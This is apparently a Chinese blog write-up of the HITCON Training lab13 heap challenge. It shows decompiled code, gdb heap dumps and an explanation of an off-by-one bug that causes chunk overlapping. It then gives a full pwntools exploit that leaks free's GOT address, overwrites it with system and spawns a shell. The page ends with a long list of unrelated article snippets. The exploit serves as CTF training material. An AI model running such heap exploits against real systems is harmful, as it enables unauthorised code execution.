九层台
九层台

Chunk Extend and Overlapping(HITCON Trainging lab13)

数据结构

unsigned __int64 create_heap()
{
  _QWORD *v0; // rbx
  signed int i; // [rsp+4h] [rbp-2Ch]
  size_t size; // [rsp+8h] [rbp-28h]
  char buf; // [rsp+10h] [rbp-20h]
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    if ( !heaparray[i] )
    {
      heaparray[i] = malloc(0x10uLL);
      if ( !heaparray[i] )
      {
        puts("Allocate Error");
        exit(1);
      }
      printf("Size of Heap : ");
      read(0, &buf, 8uLL);
      size = atoi(&buf);
      v0 = heaparray[i];
      v0[1] = malloc(size);
      if ( !*((_QWORD *)heaparray[i] + 1) )
      {
        puts("Allocate Error");
        exit(2);
      }
      *(_QWORD *)heaparray[i] = size;
      printf("Content of heap:", &buf);
      read_input(*((_QWORD *)heaparray[i] + 1), size);
      puts("SuccessFul");
      return __readfsqword(0x28u) ^ v5;
    }
  }
  return __readfsqword(0x28u) ^ v5;
}
gef➤  x /10xg 0x0000000006020A0
0x6020a0 <heaparray>:   0x00000000010a2260  0x00000000010a22a0
0x6020b0 <heaparray+16>:    0x0000000000000000  0x0000000000000000
0x6020c0 <heaparray+32>:    0x0000000000000000  0x0000000000000000
0x6020d0 <heaparray+48>:    0x0000000000000000  0x0000000000000000
0x6020e0 <heaparray+64>:    0x0000000000000000  0x0000000000000000
gef➤  x /20xg 0x00000000010a2250
0x10a2250:  0x0000000000000000  0x0000000000000021
0x10a2260:  0x000000000000000a  0x00000000010a2280
0x10a2270:  0x0000000000000000  0x0000000000000021
0x10a2280:  0x0a71717171717171  0x0000000000000000
0x10a2290:  0x0000000000000000  0x0000000000000021
0x10a22a0:  0x000000000000000a  0x00000000010a22c0
0x10a22b0:  0x0000000000000000  0x0000000000000021
0x10a22c0:  0x0a77777777777777  0x0000000000000000
0x10a22d0:  0x0000000000000000  0x0000000000020d31

可以看出来,程序维持了一个数组,数组里面是每个node.
每个node有2项——size和content。

read_input(*((void **)heaparray[v1] + 1), *(_QWORD *)heaparray[v1] + 1LL);

edit函数的这里可以多输入一个字节,出现了off-by-one

利用
通过off-one-byte实现更改下一个chunk的size。
空间释放后再次申请会出现chunk overlapping
所谓overlapping其实就是更改chunk的size让一个chunk实际包含2个chunk的内容

Chunk Extend and Overlapping(HITCON Trainging lab13)_第1张图片

from pwn import *

p=process("./heapcreator")
#context.log_level='debug'
elf=ELF("./heapcreator")
libc=ELF("libc.so.6")

def create(size,content):
    p.recvuntil("Your choice :")
    p.sendline("1")
    p.recvuntil("Size of Heap : ")
    p.sendline(str(size))
    p.recvuntil("Content of heap:")
    p.sendline(content)
    p.recvuntil("SuccessFul\n")

def edit(index,content):
    p.recvuntil("Your choice :")
    p.sendline("2")
    p.recvuntil("Index :")
    p.sendline(str(index))
    p.recvuntil("Content of heap : ")
    p.sendline(content)
    p.recvuntil("Done !\n")

def show(index):
    p.recvuntil("Your choice :")
    p.sendline("3")
    p.recvuntil("Index :")
    p.sendline(str(index))
    p.recvuntil("Done !\n")

def delete(index):
    p.recvuntil("Your choice :")
    p.sendline("4")
    p.recvuntil("Index :")
    p.sendline(str(index))
    p.recvuntil("Done !\n")

def show_got(index):
    p.recvuntil("Your choice :")
    p.sendline("3")
    p.recvuntil("Index :")
    p.sendline(str(index))
def get_shell(index):
    p.recvuntil("Your choice :")
    p.sendline("4")
    p.recvuntil("Index :")
    p.sendline(str(index))

create(0x28,"A")
create(0x10,"B")
#b *0x0000000000400B2B
#gdb.attach(p)
#x /10xg 0x0000000006020A0

edit(0,("/bin/sh"+'\x00').ljust(0x28)+'\x41')
#gdb.attach(p)
delete(1)
create(0x30,"Q"*0x18+p64(0x21)+p64(0x30)+p64(elf.got["free"]))
show_got(1)
p.recvuntil("Content : ")
free_addr=u64(p.recv(6)+"\x00"*2)
print "free_addr="+hex(free_addr)
system_addr=free_addr-libc.symbols["free"]+libc.symbols["system"]
edit(1,p64(system_addr))

get_shell(0)

p.interactive()
show(0)

你可能感兴趣的:(堆溢出)

  • 【c++基础概念深度理解——堆和栈的区别,并实现堆溢出和栈溢出】 XWWW668899 C++基本概念c++c语言开发语言青少年编程
    文章目录概要技术名词解释栈溢出和堆溢出小结概要学习C++语言,避免不了要好好理解一下堆(Heap)和栈(Stack),有助于更好地管理内存,以及如何写出一段程序“成功实现”堆溢出和栈溢出。技术名词解释理解东西最快的方式是根据自己目前能理解的词语去关联新的概念,不断的纠正,向正确的深度理解靠近,当无限接近的时候也就理解了想要理解的概念。我们经常说堆栈,把这两个名词放到一起。其实,堆是堆,栈是栈,两种
  • 堆栈溢出的原因 木小同 面试jvmjava内存溢出jvm优化内存泄漏
    堆和栈在JVM内存模型中,存在这样几个内存结构,主要是堆和栈。堆:JVM运行中产生变量的实际存储地址栈:每一个线程都会对应一个方法栈,主要存储线程运行时声明的变量,栈的大小取决去这个线程运行的深度堆溢出当创建对象时,没有足够的可用空间,则会发生堆溢出。java.lang.OutOfMemoryError:Javaheapspace堆内存空间不足,一种是真的不够,还有一种是发生了死循环,对象一直在创
  • 深入剖析二进制漏洞:原理、类型与利用方法 天域网络科技 安全网络web安全
    目录引言1.1二进制漏洞简介1.2二进制漏洞的常见类型1.3二进制漏洞在CTF中的重要性缓冲区溢出2.1缓冲区溢出的基本原理2.2栈溢出攻击2.2.1EIP覆盖与ROP攻击2.2.2栈溢出的防御机制2.3堆溢出攻击2.3.1堆管理机制与漏洞利用2.3.2堆溢出的利用技巧格式化字符串漏洞3.1格式化字符串漏洞的原理3.2漏洞利用:信息泄露与任意写3.3格式化字符串漏洞的防御措施整数溢出4.1整数溢出
  • 深度剖析Java内存溢出:从堆到栈的全面解析 九转成圣 Java高频面试栏开发语言java后端jvm
    Java内存溢出是指在Java程序运行过程中,超出JVM分配的内存范围,导致内存不足的异常情况。本文将深入探讨Java内存溢出的各种类型,包括堆溢出、栈溢出、运行时常量池溢出、元空间溢出、直接内存溢出等,并提供详细的示例代码和技术解析。一、堆溢出(HeapOverflow)堆内存用于存储对象实例和数组。当持续创建新对象且无法及时回收内存时,会导致堆内存溢出。示例代码://设置JVM参数:-Xms2
  • 堆溢出 Use After Free(UAF) 无极921 网络安全网络安全web安全ctf
    在CTF(CaptureTheFlag)竞赛中,UseAfterFree(UAF)是一种常见的内存安全漏洞,它发生在程序对已经释放的内存进行访问或操作的时候。这种漏洞通常源于程序设计或实现中的错误,特别是当程序未能正确跟踪内存块的分配和释放状态时。下面详细解释UAF漏洞及其在CTF竞赛中的利用方式。UAF漏洞原理当一个内存块被释放后,它应该被标记为不可用,直到再次被分配。然而,如果程序在内存被释放
  • zer0pts-2020-memo:由文件偏移处理不正确--引发的堆溢出 goodcat666 pwn_cve_kernellinuxpwn
    启动脚本#!/bin/shqemu-system-x86_64\-m256M\-kernel./bzImage\-initrd./rootfs.cpio\-append"root=/dev/ramrwconsole=ttyS0oops=panicpanic=1kaslrquiet"\-cpukvm64,+smep,+smap\-monitor/dev/null\-nographic-enable-
  • ESXi 勒索病毒ESXiArgs 其 CVE-2021-21974 漏洞分析 Songxwn VMware网络安全服务器
    个人博客https://songxwn.com介绍该漏洞编号为CVE-2021-21974,由OpenSLP服务中的堆溢出问题引起,未经身份验证的攻击者可以此进行低复杂度攻击。该漏洞主要影响6.x版和6.7、7.0版本之前的ESXi管理程序,2021年2月23日,VMware曾发布补丁修复了该漏洞。(在此之后发布的版本不影响)该漏洞启动之后,主要破坏行为为停止所有虚拟机,并加密所有数据文件。具体影
  • 堆溢出:深入理解与防范 白猫a~ 网络安全安全网络二进制堆溢出网络安全
    在计算机安全领域中,堆溢出是一种常见的安全漏洞,它涉及到程序中的内存分配和管理。本文将深入探讨堆溢出的概念、原因以及防范措施。首先,我们需要了解什么是堆。在许多编程语言中,如C和C++,堆是用于动态内存分配的区域。当程序运行时,它需要分配和释放内存以存储数据。堆用于满足这种需求,它允许程序在运行时动态地分配和释放内存。然而,当程序试图分配的内存超出了堆的大小,或者在释放内存后未能正确地回收空间时,
  • jvm2:Java内存溢出 sunpy
    内存泄露和内存溢出的区别内存溢出通俗理解就是内存不够了,不能分配足够大的内存。内存泄露就是程序中已动态分配的堆内存没有释放,造成内存浪费。可以发现内存泄露不停发生最终会导致内存溢出。Java堆溢出/***-Xms10m启动时分配内存10m*-Xmx10m最大内存10m*@paramargs*/publicstaticvoidmain(String[]args){Listlist=newArrayL
  • 17.JVM-[一篇通] 晓星航 JavaEEjvmjavaee面试垃圾回收
    文章目录JVM1.JVM简介(一个进程有一个JVM)1.1JVM发展史1.2JVM和《Java虚拟机规范》2.JVM运行流程2.1JVM执行流程3.JVM运行时数据区3.1堆(线程共享一个进程只有一份堆)3.2Java虚拟机栈(线程私有每个线程都有一份属于自己的栈)3.3本地方法栈(线程私有)3.4程序计数器(线程私有)3.5方法区(线程共享)3.6内存布局中的异常问题3.6.1①Java堆溢出3
  • P5742 【深基7.例11】评等级 玖剹 题目讲解算法数据结构学习方法线性代数c语言
    一:题目二:思路分析1.这道题如果直接定义一个结构体数组,数组大小太大,会导致堆溢出2.再细看题目的要求,要求我们写一个参数为结构体的函数3.如果直接写会导致堆溢出,我们可以用calloc在栈区开辟一块结构体大小的空间三:代码#include#include//P5742评等级structStu{ints;intg;inth;intsum;};voidFunc(structStu*p){if((p
  • java分析内存泄漏_Java中的内存泄漏分析说明 孙圈圈 java分析内存泄漏
    Java内存区域分析@(博客文章)[java]Java内存区域分析一Java程序的内存组成1Java堆2方法区含常量池3栈1Java虚拟机栈2本地方法栈4程序计数器5直接内存二各种OOM情形模拟一Java堆溢出二方法区含常量池溢出三栈溢出四直接内存溢出参考《深入理解JJava语言的一个关键的优势就是它的内存管理机制。你只管创建对象,Java的垃圾回收器帮你分配以及回收内存。然而,实际的情况并没有那
  • (BUUCTF)ciscn_2019_sw_7 LtfallQwQ pwn_writeup网络安全安全系统安全
    文章目录前置知识整体思路exp前置知识堆溢出tcache_perthread_structhijacking重叠指针构建整体思路read中有一个整数溢出,假如输入的size小于等于0,那么在输入内容的时候会将一个有符号整数和无符号整数进行比较,如下:这会使得有符号整数被强制类型转换为无符号整数,从而导致负数会被转换为一个非常大的正数,从而实现一个几乎无限大小的堆溢出。因此我们通过输入size为0的
  • 如何使用gflags.exe查看内存来源 wangyue4 windows
    使用gflags.exe工具并不能直接查看内存的来源,即它不能告诉你某块内存是在哪个函数调用或代码行中分配的。然而,gflags可以结合其他调试工具帮助你检测和分析内存问题,如内存泄漏、堆溢出等。例如,如果你想追踪某个进程的内存分配情况以便找到潜在的内存泄漏源,你可以通过以下步骤操作:使用gflags设置用户模式堆栈跟踪(UserStackTraces)功能:gflags/iYourApp.exe
  • 【基础篇】十、JVM堆 && 直接内存 -代号9527 JVMjvm
    文章目录一、堆1、堆heap2、堆溢出3、used、total、max4、设置堆内存大小二、直接内存运行时数据区域,还有两组成部分:堆和方法区,和栈、程序计数器不同,它们是线程共享的一、堆1、堆heap堆内存是线程共享的创建出来的对象存于堆内存如图:栈里的局部变量中存了堆上对象的引用:2、堆溢出ArrayListlist=newArrayListlist=newArrayListlist=newA
  • JVM(三)OutOfMemoryError异常 干天慈雨
    1Java堆溢出堆内存中主要存放对象、数组等,只要不断地创建这些对象,并且保证GCRoots到对象之间有可达路径来避免垃圾收集回收机制清除这些对象,当这些对象所占空间超过最大堆容量时,就会产生OutOfMemoryError的异常。堆内存异常示例如下:publicclassHeapOOM{//设置JVM参数最大堆和最小堆:-Xms20m-Xmx20mstaticclassOOMObject{}pu
  • 【userfaultfd 条件竞争】starCTF2019 - hackme XiaozaYa kernel-pwn条件竞争kernelpwn
    前言呜呜呜,这题不难,但是差不多一个多月没碰我的女朋友kernelpwn了,对我的root宝宝也是非常想念,可惜这题没有找到我的root宝宝,就偷了她的flag。哎有点生疏了,这题没看出来堆溢出,直接条件竞争打了,但感觉条件竞争打简单一些。题目分析内核版本4.20.13开了smap/smep/kaslr给了config配置文件,查看得到如下信息:#CONFIG_SLABisnotset#CONFI
  • 《深入理解JAVA虚拟机笔记》OutOfMemoryError 异常 川峰 Java知识笔记javajvmOOM堆溢出栈溢出方法区溢出直接内存溢出
    在《Java虚拟机规范》的规定里,除了程序计数器外,虚拟机内存的其他几个运行时区域都有发生OutOfMemoryError(下文称OOM)异常的可能。Java堆溢出Java堆用于储存对象实例,我们只要不断地创建对象,并且保证GCRoots到对象之间有可达路径来避免垃圾回收机制清除这些对象,那么随着对象数量的增加,总容量触及最大堆的容量限制后就会产生内存溢出异常。下面代码限制Java堆的大小为20M
  • 2018-06-16-第五章节-网络服务渗透攻击 最初的美好_kai
    1.内存攻击内存攻击的根本原因是图灵计算机没能严格区分内存中的数据和指令而导致的。A:缓冲区溢出漏洞是因为程序缺乏对缓冲区的边界进行条件检查而引起的一种异常行为。缓冲区溢出又分为栈溢出与堆溢出两种类型。栈溢出栈溢出的基本原理在于程序使用栈这种数据结构来控制程序运行流程,程序先将函数返回地址压入栈中,然后执行结束以后再从栈中取回函数返回地址,继续执行指令。问题是出现在当我们向栈中的地址写入数据时,当
  • 压力测试过程中内存溢出(堆溢出、栈溢出、持久代溢出)情况如何解决 虚幻如影 性能测试压力测试
    在压力测试过程中,可能会遇到内存溢出的问题,其中常见的包括堆内存溢出、栈内存溢出和持久代溢出。解决这类问题需要首先理解各种内存溢出的原因和特点。堆内存溢出:这种情况通常发生在稳定性压测一段时间后,系统报错,日志报java.lang.OutOfMemoryError.Javaheapspace。可以通过使用jmap-histopid|head-20命令来dump堆内存使用情况,查看堆内存排名前20个
  • 内网安全—Windows系统内核溢出漏洞提权 失之一灵 安全web安全网络安全网络
    系统内核溢出漏洞提权往缓冲区中写入超出限定长度的内容,造成缓冲区溢出,从而破坏程序的堆栈进而运行自己精心准备的指定代码,达到攻击的目的。分类:堆溢出栈溢出查找补丁的方法1、手工查找补丁情况systeminfoWmicqfegetCaption,Description,HotFixlD,InstalledOn2、MSF后渗透扫描post/windows/gather/enum_patchespost
  • JVM-3-OutOfMemoryErrory内存溢出 Andy.88666 JVMjvmjava开发语言
    堆溢出Java堆用于储存对象实例,我们只要不断地创建对象,并且保证GCRoots到对象之间有可达路径来避免垃圾回收机制清除这些对象,那么随着对象数量的增加,总容量触及最大堆的容量限制后就会产生内存溢出异常。将堆的最小值-Xms参数与最大值-Xmx参数设置为一样即可避免堆自动扩展。通过参数-XX:+HeapDumpOnOutOf-MemoryError可以让虚拟机在出现内存溢出异常的时候Dump出当
  • 深入理解Java虚拟机---对象的创建和内存异常溢出 kk变色龙13 javajvm开发语言
    深入理解Java虚拟机---对象的创建和内存异常溢出对象的创建对象内存布局对象的访问定位内存溢出Java堆溢出虚拟机栈和本地方法栈溢出方法区和运行时常量池溢出本地直接内存溢出对象的创建Step1:虚拟机遇到一条new指令时,首先将去检查这个指令的参数是否能在常量池中定位到一个类的符号引用,并且检查这个符号引用代表的类是否已被加载、解析和初始化过。如果没有,那必须先执行相应的类加载过程。Step2:
  • 基础堆溢出原理与DWORD SHOOT实现 Risehuxyc #C/C++数据结构
    堆介绍堆的数据结构与管理策略程序员在使用堆时只需要做三件事情:申请一定大小的内存,使用内存,释放内存。对于堆管理系统来说,响应程序的内存使用申请就意味着要在"杂乱"的堆区中"辨别"出哪些内存是正在被使用的,哪些内存是空闲的,并最终"寻找"到一片"恰当"的空闲内存区域,以指针形式返回给程序。1."杂乱"是指堆区经过反复的申请、释放操作之后,原本大片连续的空间内存区可能呈现出大小不等且空闲块、占用快相
  • 面试题-JVM性能调优 java领域 java面试经验分享程序人生分布式
    目录前言JVM性能调优内存溢出错误堆溢出错误和预判堆溢出的错误虚拟机栈和本地方法栈溢出错误方法区(元数据区)和运行时常量池溢出直接内存区域的溢出实践案例如何正确利用大内存-高性能硬件上的程序部署策略如何排查内存溢出错误如何排查系统CPU性能指标异常-外部命令导致系统缓慢返回目录前言JVM性能调优是一个很大的话题,很多中小企业的业务规模受限,没有迫切的性能调优需求,但是如果不知道JVM相关的理论知识
  • 深入理解Java虚拟机 HelloWorld_AA java虚拟机java虚拟机
    1走近Java71.1概述71.2Java技术体系71.3Java发展史72Java内存区域与内存溢出异常82.1概述82.2运行时数据区域82.2.1程序计数器82.2.2Java虚拟机栈82.2.3本地方法栈92.2.4Java堆92.2.5方法区92.2.6运行时常量池92.2.7直接内存92.3对象访问92.4实战:OutOfMemoryError异常102.4.1Java堆溢出102.4
  • ctf比赛涉及的方面以及所需知识 镜.. 安全
    Reverse题目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译功底。主要考查参赛选手的逆向分析能力。所需知识:汇编语言、加密与解密、常见反编译工具PwnPwn在黑客俚语中代表着攻破,获取权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有整数溢出、栈溢出、堆溢出等。主要考查参赛选手对漏洞的利用能力。所需知识:C,OD+IDA,数据结构,操作系统Web是CTF的主要题型,题目涉
  • 一网打尽CodeReview要点(JAVA) aleixu 研发技术IT安全codereviewcheckjavareview代码
    常规检查业务1.根据需求检查业务逻辑代码是否正确2.检查代码是否符合编码规范3.检查代码是否存在潜在bug或内存泄露4.检查代码是否存在性能瓶颈常见BUG1.空指针异常,如使用对象时为保证其非null2.类型转换异常,如强制转换3.算术异常,如除数为04.越界异常,如数组越界5.内存溢出异常,如栈溢出(递归)、堆溢出等例如:递归函数必须有闭环条件即终止条件,或递归层级建议1000以内6.对象隐式更
  • JVM——一文搞懂JVM内存溢出和内存泄漏 静惘 JVMjvmjava开发语言
    1、内存溢出和内存泄漏的区别?内存溢出(OutOfMemory):指程序在申请内存时,没有足够的内存空间供其使用。内存泄露(MemoryLeak):指程序在申请内存后,无法释放已申请的内存空间,内存泄漏最终将导致内存溢出。2、堆溢出的原因?答:堆用于存储对象实例,只要不断创建对象并保证GCRoots到对象有可达路径避免垃圾回收,随着对象数量的增加,总容量触及最大堆容量后就会OOM,例如在while
  • OOM问题汇总(搬运) BiuPsYao JAVA开发javajvmoom
    写在开头搬运来自原文堆溢出java.lang.OutOfMemoryError:Javaheapspace原因1、代码中可能存在大对象分配2、可能存在内存泄露,导致在多次GC之后,还是无法找到一块足够大的内存容纳当前对象。解决方法1、检查是否存在大对象的分配,最有可能的是大数组分配2、通过jmap命令,把堆内存dump下来,使用mat工具分析一下,检查是否存在内存泄露的问题3、如果没有找到明显的内
  • JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm字节码Class文件StackMapTable
            在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率,在字节码规范中添加了Stack Map Table属性,以下简称栈图,其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
  • 回调函数调用方法 百合不是茶 java
    最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记 记录一下   代码很简单:           MainDemo  :调用方法  得到方法的返回结果        
  • [时间机器]制造时间机器需要一些材料 comsci 制造
          根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质     和材料...       甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......      
  • 开口埋怨不如闭口做事 邓集海 邓集海 做人 做事 工作
    “开口埋怨,不如闭口做事。”不是名人名言,而是一个普通父亲对儿子的训导。但是,因为这句训导,这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子,叫张明正。      张明正出身贫寒,读书时成绩差,常挨老师批评。高中毕业,张明正连普通大学的分数线都没上。高考成绩出来后,平时开口怨这怨那的张明正,不从自身找原因,而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。      
  • jQuery插件开发全解析,类级别与对象级别开发 IT独行者 jquery开发插件 函数
    jQuery插件的开发包括两种: 一种是类级别的插件开发,即给 jQuery添加新的全局函数,相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数,另一种是对象级别的插件开发,即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。   1 、类级别的插件开发 类级别的插件开发最直接的理解就是给jQuer
  • Rome解析Rss 413277409 Rome解析Rss
    import java.net.URL;  import java.util.List;    import org.junit.Test;    import com.sun.syndication.feed.synd.SyndCategory;  import com.sun.syndication.feed.synd.S
  • RSA加密解密 无量 加密解密rsa
    RSA加密解密代码 代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
  • linux 软件安装遇到的问题 aichenglong linux遇到的问题ftp
    1 ftp配置中遇到的问题    500 OOPS: cannot change directory   出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了   修改方法:1 修改/etc/selinux/config 中SELINUX=disabled    2 source /etc
  • 面试心得 alafqq 面试
    最近面试了好几家公司。记录下; 支付宝,面试我的人胖胖的,看着人挺好的;博彦外包的职位,面试失败; 阿里金融,面试官人也挺和善,只不过我让他吐血了。。。 由于印象比较深,记录下; 1,自我介绍 2,说下八种基本类型;(算上string。楼主才答了3种,哈哈,string其实不是基本类型,是引用类型) 3,什么是包装类,包装类的优点; 4,平时看过什么书?NND,什么书都没看过。。照样
  • java的多态性探讨 百合不是茶 java
    java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
  • 网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
    1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
  • 探索JUnit4扩展:深入Rule bijian1013 JUnitRule单元测试
            本文将进一步探究Rule的应用,展示如何使用Rule来替代@BeforeClass,@AfterClass,@Before和@After的功能。         在上一篇中提到,可以使用Rule替代现有的大部分Runner扩展,而且也不提倡对Runner中的withBefores(),withAfte
  • [CSS]CSS浮动十五条规则 bit1129 css
    这些浮动规则,主要是参考CSS权威指南关于浮动规则的总结,然后添加一些简单的例子以验证和理解这些规则。   1. 所有的页面元素都可以浮动 2. 一个元素浮动后,会成为块级元素,比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动,会向最近的块级父元素的左上角移动,直到浮动元素的左外边界碰到块级父元素的左内边界;如果这个块级父元素已经有浮动元素停靠了
  • 【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
    0.Kafka服务器配置 3个broker 1个topic,6个partition,副本因子是2 2个consumer,每个consumer三个线程并发读取   1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
  • zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
    Aliaskey的别名,例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1], 或者ttlsa的用户ID。你可以使用key:vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1],也可以使用ttlsa.userid。备注: 别名不能重复,但是可以有多个
  • java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
    参考了网上的思路,写了个Java版的: public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
  • Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan javanetty
    先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制,如下: 实
  • AES加密解密 chicony 加密解密
    AES加解密算法,使用Base64做转码以及辅助加密: package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
  • 文件编码格式转换 ctrain 编码格式
    package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
  • mysql 在linux客户端插入数据中文乱码 daizj mysql中文乱码
    1、查看系统客户端,数据库,连接层的编码  查看方法: http://daizj.iteye.com/blog/2174993 进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+------
  • 好代码是廉价的代码 dcj3sjt126com 程序员读书
      长久以来我一直主张:好代码是廉价的代码。 当我跟做开发的同事说出这话时,他们的第一反应是一种惊愕,然后是将近一个星期的嘲笑,把它当作一个笑话来讲。 当他们走近看我的表情、知道我是认真的时,才收敛一点。 当最初的惊愕消退后,他们会用一些这样的话来反驳: “好代码不廉价,好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
  • Android网络请求库——android-async-http dcj3sjt126com android
    在iOS开发中有大名鼎鼎的ASIHttpRequest库,用来处理网络请求操作,今天要介绍的是一个在Android上同样强大的网络请求库android-async-http,目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库,网络处理均基于Android的非UI线程,通
  • ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化Oracle sql语句优化SQL语句的优化
    转载请出自出处:http://eksliang.iteye.com/blog/2097999   SQL语句的优化总结如下   sql语句的优化可以按照如下六个步骤进行: 合理使用索引 避免或者简化排序 消除对大表的扫描 避免复杂的通配符匹配 调整子查询的性能 EXISTS和IN运算符 下面我就按照上面这六个步骤分别进行总结:
  • 浅析:Android 嵌套滑动机制(NestedScrolling) gg163 android移动开发滑动机制嵌套
    谷歌在发布安卓 Lollipop版本之后,为了更好的用户体验,Google为Android的滑动机制提供了NestedScrolling特性 NestedScrolling的特性可以体现在哪里呢?<!--[if !supportLineBreakNewLine]--><!--[endif]--> 比如你使用了Toolbar,下面一个ScrollView,向上滚
  • 使用hovertree菜单作为后台导航 hvt JavaScriptjquery.nethovertreeasp.net
      hovertree是一个jquery菜单插件,官方网址:http://keleyi.com/jq/hovertree/ ,可以登录该网址体验效果。 0.1.3版本:http://keleyi.com/jq/hovertree/demo/demo.0.1.3.htm hovertree插件包含文件: http://keleyi.com/jq/hovertree/css
  • SVG 教程 (二)矩形 天梯梦 svg
    SVG <rect> SVG Shapes SVG有一些预定义的形状元素,可被开发者使用和操作: 矩形 <rect> 圆形 <circle> 椭圆 <ellipse> 线 <line> 折线 <polyline> 多边形 <polygon> 路径 <path>
  • 一个简单的队列 luyulong java数据结构队列
    public class MyQueue { private long[] arr; private int front; private int end; // 有效数据的大小 private int elements; public MyQueue() { arr = new long[10]; elements = 0; front
  • 基础数据结构和算法九:Binary Search Tree sunwinner Algorithm
      A binary search tree (BST) is a binary tree where each node has a Comparable key (and an associated value) and satisfies the restriction that the key in any node is larger than the keys in all
  • 项目出现的一些问题和体会 Steven-Walker DAOWebservlet
         第一篇博客不知道要写点什么,就先来点近阶段的感悟吧。     这几天学了servlet和数据库等知识,就参照老方的视频写了一个简单的增删改查的,完成了最简单的一些功能,使用了三层架构。 dao层完成的是对数据库具体的功能实现,service层调用了dao层的实现方法,具体对servlet提供支持。  &
  • 高手问答:Java老A带你全面提升Java单兵作战能力! ITeye管理员 java
    本期特邀《Java特种兵》作者:谢宇,CSDN论坛ID: xieyuooo 针对JAVA问题给予大家解答,欢迎网友积极提问,与专家一起讨论! 作者简介: 淘宝网资深Java工程师,CSDN超人气博主,人称“胖哥”。 CSDN博客地址: http://blog.csdn.net/xieyuooo 作者在进入大学前是一个不折不扣的计算机白痴,曾经被人笑话过不懂鼠标是什么,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他